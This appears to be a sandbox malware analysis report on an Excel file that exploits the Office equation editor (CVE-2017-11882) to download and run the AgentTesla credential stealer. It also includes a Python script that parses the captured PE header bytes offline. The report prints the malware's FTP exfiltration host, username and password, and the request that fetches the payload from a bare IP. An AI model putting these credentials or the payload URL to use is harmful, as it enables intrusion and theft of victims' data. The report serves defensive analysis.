Windows Analysis Report
2nd order.xlsx

Overview

General Information

Sample Name: 2nd order.xlsx
Analysis ID: 562302
MD5: 2228ac7e47957e002d910cc94f89de42
SHA1: b501e0c89273dab89064714d02cdac80f2b66081
SHA256: c4cc3595a77129454c15a736113cb88234acc97074f7305754187d9fc168f58a
Tags: xlsx

Detection

AgentTesla
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Sigma detected: EQNEDT32.EXE connecting to internet
Malicious sample detected (through community Yara rule)
Yara detected AgentTesla
Yara detected AntiVM3
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: File Dropped By EQNEDT32EXE
Antivirus detection for URL or domain
Tries to steal Mail credentials (via file / registry access)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Sigma detected: Execution from Suspicious Folder
.NET source code contains method to dynamically call methods (often used by packers)
Office equation editor drops PE file
.NET source code contains very large array initializations
Machine Learning detection for dropped file
Drops PE files to the user root directory
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Yara detected Credential Stealer
IP address seen in connection with other malware
Downloads executable code via HTTP
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Potential document exploit detected (unknown TCP traffic)
Drops PE files
Uses a known web browser user agent for HTTP communication
Office Equation Editor has been started
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Drops PE files to the user directory
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)

Classification

AV Detection

Source: 5.0.vbc.exe.400000.11.unpack Malware Configuration Extractor: Agenttesla {"Exfil Mode": "FTP", "FTP Host": "ftp://primesinsured.com/", "Username": "oil1@primesinsured.com", "Password": "R0r?~C#w}a*s"}
Source: ftp://primesinsured.com/oil1 Avira URL Cloud: Label: malware
Source: C:\Users\Public\vbc.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe Joe Sandbox ML: detected
Source: 5.0.vbc.exe.400000.11.unpack Avira: Label: TR/Spy.Gen8
Source: 5.0.vbc.exe.400000.5.unpack Avira: Label: TR/Spy.Gen8
Source: 5.0.vbc.exe.400000.9.unpack Avira: Label: TR/Spy.Gen8
Source: 5.0.vbc.exe.400000.13.unpack Avira: Label: TR/Spy.Gen8
Source: 5.0.vbc.exe.400000.7.unpack Avira: Label: TR/Spy.Gen8

Exploits

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe Jump to behavior
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: Binary string: CallConvFastca.pdbx2 source: vbc.exe.2.dr, vbc[1].exe.2.dr
Source: Binary string: CallConvFastca.pdb source: vbc.exe, vbc.exe.2.dr, vbc[1].exe.2.dr

Software Vulnerabilities

Source: global traffic TCP traffic: 192.168.2.22:49167 -> 198.12.127.213:80
Source: excel.exe Memory has grown: Private usage: 4MB later: 51MB

Networking

Source: Joe Sandbox View ASN Name: AS-COLOCROSSINGUS
Source: Joe Sandbox View IP Address: 198.12.127.213
Source: global traffic HTTP traffic detected (response to GET /400/vbc.exe):
  HTTP/1.1 200 OK
  Date: Fri, 28 Jan 2022 17:40:42 GMT
  Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/7.4.24
  Last-Modified: Fri, 28 Jan 2022 13:52:18 GMT
  ETag: "d2200-5d6a4be475dda"
  Accept-Ranges: bytes
  Content-Length: 860672
  Keep-Alive: timeout=5, max=100
  Connection: Keep-Alive
  Content-Type: application/x-msdownload
  Data Raw (start of the response body; the rest of the captured chunk is zero padding and is omitted here):
    DOS header (e_lfanew = 0x80):
      4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00
      00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00
    DOS stub ("This program cannot be run in DOS mode."):
      0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f
      74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00
    PE signature and COFF file header (Machine 0x014c = i386, 4 sections, TimeDateStamp 0x61f3f50c, SizeOfOptionalHeader 0xe0):
      50 45 00 00 4c 01 04 00 0c f5 f3 61 00 00 00 00 00 00 00 00 e0 00 0e 01
    Optional header, PE32 (entry point RVA 0xd329e, ImageBase 0x400000, Subsystem 2 = GUI, 16 data directories; directory 14, the CLR runtime header, is set to RVA 0x2008 size 0x48, i.e. a .NET assembly):
      0b 01 06 00 00 14 0d 00 00 0a 00 00 00 00 00 00 9e 32 0d 00 00 20 00 00 00 40 0d 00 00 00 40 00
      00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 a0 0d 00 00 04 00 00
      00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00
      00 00 00 00 00 00 00 00 50 32 0d 00 4b 00 00 00 00 60 0d 00 c0 05 00 00 00 00 00 00 00 00 00 00
      00 00 00 00 00 00 00 00 00 80 0d 00 0c 00 00 00 fb 31 0d 00 1c 00 00 00 00 00 00 00 00 00 00 00
      00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00
    Section table (.text, .sdata, .rsrc, .reloc; the last section ends at file offset 0xd2200 = 860672, which equals Content-Length):
      2e 74 65 78 74 00 00 00 a4 12 0d 00 00 20 00 00 00 14 0d 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60
      2e 73 64 61 74 61 00 00 e8 01 00 00 00 40 0d 00 00 02 00 00 00 18 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0
      2e 72 73 72 63 00 00 00 c0 05 00 00 00 60 0d 00 00 06 00 00 00 1a 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40
      2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 80 0d 00 00 02 00 00 00 20 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42
Source: global traffic HTTP traffic detected (request):
  GET /400/vbc.exe HTTP/1.1
  Accept: */*
  Accept-Encoding: gzip, deflate
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
  Host: 198.12.127.213
  Connection: Keep-Alive
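The request above fetched the second-stage vbc.exe, and the response entry preserves the first bytes of the body. The following Python is an added example, not part of the Joe Sandbox report: it parses the PE headers out of those captured bytes and cross-checks them against the response headers. The hex constants and header values are transcribed from the report's HTTP entry (the zero padding after the section table is omitted); the parser also accepts PE32+ images, although this one is PE32. Nothing is fetched from the network.

```python
"""Offline check of the executable served by 198.12.127.213 in this report.

RESPONSE_HEADERS and the hex constants are transcribed from the report's
"HTTP traffic detected" entry; the captured chunk continues with zero
padding, which is omitted. Nothing is fetched from the network.
"""
import struct
from datetime import datetime, timezone

RESPONSE_HEADERS = {
    "Content-Type": "application/x-msdownload",
    "Content-Length": "860672",
    "ETag": '"d2200-5d6a4be475dda"',
    "Last-Modified": "Fri, 28 Jan 2022 13:52:18 GMT",
}

# Bytes 0x000-0x07f: MZ header (e_lfanew = 0x80) and the DOS stub.
DOS_PART = (
    "4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 "
    "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 "
    "0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f "
    "74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 "
)
# Bytes 0x080-0x177: PE signature, COFF file header and PE32 optional header.
NT_HEADERS = (
    "50 45 00 00 4c 01 04 00 0c f5 f3 61 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 06 00 00 14 0d 00 "
    "00 0a 00 00 00 00 00 00 9e 32 0d 00 00 20 00 00 00 40 0d 00 00 00 40 00 00 20 00 00 00 02 00 00 "
    "04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 a0 0d 00 00 04 00 00 00 00 00 00 02 00 40 85 "
    "00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 "
    "50 32 0d 00 4b 00 00 00 00 60 0d 00 c0 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 "
    "00 80 0d 00 0c 00 00 00 fb 31 0d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 "
    "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 "
    "00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 "
)
# Bytes 0x178-0x217: four IMAGE_SECTION_HEADER entries of 40 bytes each.
SECTION_TABLE = (
    "2e 74 65 78 74 00 00 00 a4 12 0d 00 00 20 00 00 00 14 0d 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 "
    "2e 73 64 61 74 61 00 00 e8 01 00 00 00 40 0d 00 00 02 00 00 00 18 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 "
    "2e 72 73 72 63 00 00 00 c0 05 00 00 00 60 0d 00 00 06 00 00 00 1a 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 "
    "2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 80 0d 00 00 02 00 00 00 20 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 "
)
DATA_RAW = bytes.fromhex(DOS_PART + NT_HEADERS + SECTION_TABLE)


def parse_pe_headers(data: bytes) -> dict:
    """Parse the DOS, COFF and optional headers plus the section table of a PE image."""
    if data[:2] != b"MZ":
        raise ValueError("no MZ signature")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("no PE signature at e_lfanew")
    machine, nsect, stamp, _symptr, _nsyms, opt_size, chars = struct.unpack_from("<HHIIIHH", data, e_lfanew + 4)
    opt = e_lfanew + 24                       # optional header follows the 20-byte COFF header
    magic = struct.unpack_from("<H", data, opt)[0]
    if magic not in (0x10B, 0x20B):
        raise ValueError("unknown optional header magic 0x%x" % magic)
    dirs_off = opt + (96 if magic == 0x10B else 112)   # PE32 vs PE32+ layout
    ndirs = struct.unpack_from("<I", data, dirs_off - 4)[0]
    dirs = [struct.unpack_from("<II", data, dirs_off + 8 * i) for i in range(ndirs)]
    sections = []
    for i in range(nsect):
        f = struct.unpack_from("<8sIIIIIIHHI", data, opt + opt_size + 40 * i)
        sections.append({"name": f[0].rstrip(b"\0").decode("ascii", "replace"), "vsize": f[1],
                         "va": f[2], "raw_size": f[3], "raw_ptr": f[4], "chars": f[9]})
    return {"machine": machine, "magic": magic, "timestamp": stamp, "characteristics": chars,
            "entry": struct.unpack_from("<I", data, opt + 16)[0],
            "subsystem": struct.unpack_from("<H", data, opt + 68)[0],
            "clr_dir": dirs[14] if ndirs > 14 else (0, 0), "sections": sections}


def check_download(headers: dict, body: bytes) -> dict:
    """Cross-check the PE headers in the body against what the server claimed about it."""
    pe = parse_pe_headers(body)
    # File size implied by the section table (an overlay appended after .reloc would not show here).
    size = max(s["raw_ptr"] + s["raw_size"] for s in pe["sections"])
    etag_size = int(headers["ETag"].strip('"').split("-")[0], 16)   # Apache's ETag starts with the size in hex
    return {
        "content_type": headers["Content-Type"],
        "is_32bit": pe["magic"] == 0x10B,
        "is_dotnet": pe["clr_dir"] != (0, 0),        # populated CLR header directory => managed assembly
        "gui_subsystem": pe["subsystem"] == 2,
        "sections": [s["name"] for s in pe["sections"]],
        "size_from_sections": size,
        "content_length_ok": size == int(headers["Content-Length"]),
        "etag_size_ok": etag_size == size,
        "link_time_utc": datetime.fromtimestamp(pe["timestamp"], tz=timezone.utc).isoformat(),
    }


if __name__ == "__main__":
    for key, value in check_download(RESPONSE_HEADERS, DATA_RAW).items():
        print(f"{key}: {value}")
```

What this confirms from the captured bytes alone: a 32-bit GUI-subsystem image whose CLR header directory is populated (a .NET assembly, consistent with the .NET signatures later in the report), four sections named .text, .sdata, .rsrc and .reloc, and a section table that ends at exactly 860672 bytes, matching both Content-Length and the hex size in the ETag, so the sandbox captured the whole file. The link timestamp decodes to 2022-01-28 13:52:12 UTC, six seconds before the server's Last-Modified value, which suggests the binary was built and uploaded by the same automated step.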
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.127.213 (50 identical entries; the download URL addresses the server by bare IP in the Host header, so no lookup precedes the connection)
Source: vbc.exe, 00000005.00000002.669188276.0000000002281000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: ftp://primesinsured.com/oil1
Source: vbc.exe, 00000005.00000002.669188276.0000000002281000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://127.0.0.1:HTTP/1.1
Source: vbc.exe, 00000005.00000002.669188276.0000000002281000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://DynDns.comDynDNS
Source: vbc.exe, 00000005.00000002.669188276.0000000002281000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://FujuYs.com
Source: vbc.exe, 00000005.00000002.669295106.0000000002371000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://SsT3DRxYDVjmHt.org
Source: vbc.exe, 00000004.00000002.475542322.0000000002491000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://blog.iandreev.com
Source: vbc.exe, 00000004.00000002.475542322.0000000002491000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://blog.iandreev.com/
Source: vbc.exe, 00000005.00000002.669330015.00000000023B4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: vbc.exe, 00000004.00000002.475822749.0000000003499000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000000.468099336.0000000000402000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000005.00000000.471469484.0000000000402000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.668828373.0000000000402000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip
Source: vbc.exe, 00000005.00000002.669188276.0000000002281000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\42532842.emf Jump to behavior

System Summary

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file
Source: 5.0.vbc.exe.400000.11.unpack, 5.2.vbc.exe.400000.0.unpack, 5.0.vbc.exe.400000.5.unpack, 5.0.vbc.exe.400000.9.unpack, <PrivateImplementationDetails>{1FA04608-F754-4784-9D27-53158C5E6177}/451A691B-4BE7-43E4-B9BE-1BBD2F43E201.cs Large array initialization: .cctor: array initializer size 11947
Source: 5.0.vbc.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 4.2.vbc.exe.24d5ea4.2.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_Anti_OldCopyPaste author = ditekSHen, description = Detects executables potentially checking for WinJail sandbox window
Source: 5.0.vbc.exe.400000.11.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 5.0.vbc.exe.400000.9.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 5.0.vbc.exe.400000.13.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 4.2.vbc.exe.34f3920.5.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 5.0.vbc.exe.400000.7.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 4.2.vbc.exe.3529940.4.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 4.2.vbc.exe.2534e8c.3.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_Anti_OldCopyPaste author = ditekSHen, description = Detects executables potentially checking for WinJail sandbox window
Source: 4.2.vbc.exe.34f3920.5.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 4.2.vbc.exe.3529940.4.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 00000005.00000002.669188276.0000000002281000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: Process Memory Space: vbc.exe PID: 2408, type: MEMORYSTR Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: C:\Users\Public\vbc.exe Code functions in process 4 (4_2): 008C82BC, 002E08B0, 002E0AEF, 002E0B00, 002E9C28, 002E9C17, 002E9E82
Source: C:\Users\Public\vbc.exe Code functions in process 5 (5_2): 008C82BC, 002EF800, 002E6048, 002E5430, 002E5778, 002EE0A2, 002E2197, 002EE490, 00784870, 00787C40, 0078FAF0, 007824D0, 0078EB68, 0078D1C8, 0078B210, 00788208
Source: C:\Users\Public\vbc.exe Memory allocated: 76F90000 page execute and read and write Jump to behavior (logged twice)
Source: C:\Users\Public\vbc.exe Memory allocated: 76E90000 page execute and read and write Jump to behavior (logged twice)
Source: C:\Users\Public\vbc.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"
Source: C:\Users\Public\vbc.exe Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
Source: C:\Users\Public\vbc.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{172BDDF8-CEEA-11D1-8B05-00600806D9B6}\InProcServer32 Jump to behavior
Source: C:\Users\Public\vbc.exe WMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
Source: C:\Users\Public\vbc.exe WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Desktop\~$2nd order.xlsx Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVRD815.tmp Jump to behavior
Source: classification engine Classification label: mal100.troj.spyw.expl.evad.winXLSX@6/18@0/1
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\Public\vbc.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll Jump to behavior (logged twice)
Source: vbc.exe.2.dr, vbc[1].exe.2.dr, 4.2.vbc.exe.8c0000.1.unpack, 4.0.vbc.exe.8c0000.0.unpack, Oz/uT.cs Cryptographic APIs: 'CreateDecryptor'
Source: 5.0.vbc.exe.400000.11.unpack, A/b2.cs Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior (logged twice)
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\Public\vbc.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems Jump to behavior

Data Obfuscation

Source: vbc.exe.2.dr, vbc[1].exe.2.dr, 4.2.vbc.exe.8c0000.1.unpack, 4.0.vbc.exe.8c0000.0.unpack, 5.0.vbc.exe.8c0000.10.unpack, 5.0.vbc.exe.8c0000.8.unpack, 5.0.vbc.exe.8c0000.3.unpack, 5.0.vbc.exe.8c0000.4.unpack, 5.0.vbc.exe.8c0000.2.unpack, 5.0.vbc.exe.8c0000.6.unpack, va/x0.cs .Net Code: eQb System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: vbc.exe.2.dr, vbc[1].exe.2.dr, 4.2.vbc.exe.8c0000.1.unpack, 4.0.vbc.exe.8c0000.0.unpack, 5.0.vbc.exe.8c0000.10.unpack, 5.0.vbc.exe.8c0000.8.unpack, 5.0.vbc.exe.8c0000.3.unpack, 5.0.vbc.exe.8c0000.4.unpack, 5.0.vbc.exe.8c0000.2.unpack, 5.0.vbc.exe.8c0000.6.unpack, Oz/uT.cs .Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
Source: C:\Users\Public\vbc.exe Code function: 5_2_00781870 push esp; retn 002Dh 5_2_00781871
Source: C:\Users\Public\vbc.exe Code function: 5_2_00782ED8 pushad ; iretd 5_2_00782ED9
Source: C:\Users\Public\vbc.exe Code function: 5_2_00781880 pushad ; retn 002Dh 5_2_007818C5

Persistence and Installation Behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file

Boot Survival

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior (10 identical entries)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior (4 identical entries)
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior (21 identical entries)
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
